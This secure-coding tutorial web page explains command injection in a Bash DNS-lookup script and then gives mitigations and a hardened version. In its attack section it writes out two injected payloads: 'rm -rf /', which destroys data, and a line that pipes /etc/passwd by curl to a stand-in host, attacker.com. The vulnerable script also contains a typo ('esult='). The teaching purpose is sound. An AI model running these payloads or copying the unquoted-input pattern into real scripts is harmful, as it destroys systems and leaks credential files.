top of page

How Cyber attackers can compromise Bash Code:

Vulnerable Script:

​Consider a Bash script that accepts user input to perform a DNS lookup.

​

bash

​

#!/bin/bash

echo "Enter a domain to look up:"

read domain

esult=$(nslookup $domain) # Vulnerable to command injection

echo "Result:"

echo "$result"

The attack:

​

  1. Malicious Input: An attacker provides the following input:

    bash

    ​

    example.com; rm -rf / # On Linux, this deletes critical files

​

   2. Injected Command: The $domain variable now contains:

       bash

 

    ​    example.com; rm -rf /

​

       The nslookup command executes as expected, but the semicolon (;) allows the second command

       (rm -rf /) to execute, deleting the filesystem.

​

   3. Result:

  • The malicious input executes both nslookup and the destructive rm -rf / command.

  • Critical system files are deleted, causing irreversible damage.

Exploit Consequences:

​

  1. System Damage: Attackers can delete, modify, or encrypt files.

​

   2. Data Theft: Malicious commands can exfiltrate sensitive files:

       bash

​

       example.com; cat /etc/passwd | curl -X POST https://attacker.com/upload --data @-

​

​

    3. Privilege Escalation: If the script is run with elevated privileges (e.g., sudo),

        attackers can take complete control of the system.

Mitigation:

 

  1. Quote Variables: Always wrap variables in double quotes to prevent the shell from interpreting special characters.

    bash

    ​

    result=$(nslookup "$domain")

​

   2. Input Validation: Validate user input to ensure it adheres to expected patterns.

       bash

​

       if [[ ! "$domain" =~ ^[a-zA-Z0-9.-]+$ ]]; then

           echo "Invalid domain"

           exit 1

       fi

​

    3. Use eval Sparingly (or Not at All): Avoid using eval or executing commands based on untrusted

        input.

​

    4. Avoid Directly Embedding Input in Commands: Use safer alternatives, such as arrays, or tools that

        separate input and logic.

​

    5. Run Scripts with Minimal Privileges: Do not run Bash scripts with unnecessary root or

       administrative privileges.

​

    6. Disable Dangerous Features: Use restrictive Bash options like set -euo pipefail to prevent

        unintended behavior:

​

        bash

​

        set -euo pipefail

​

​

  1. Sanitize Environment Variables: Explicitly unset or sanitize potentially dangerous environment

        variables before execution.

Secure Script Example

 

    Bash

​

     #!/bin/bash

​

     # Exit on errors, unset variables, and pipe failures

     set -euo pipefail

​

     echo "Enter a domain to look up:"

     read domain

​

​

     # Validate input: only allow alphanumeric, dots, and dashes

     if [[ ! "$domain" =~ ^[a-zA-Z0-9.-]+$ ]]; then

         echo "Invalid domain name."

         exit 1

     fi

​

     # Perform the DNS lookup safely

     result=$(nslookup "$domain" 2>/dev/null || echo "Lookup failed")

     echo "Result:"

     echo "$result"
 

By following these best practices, developers can mitigate risks associated with insecure Bash scripts and reduce the likelihood of exploitation by malicious actors.

bottom of page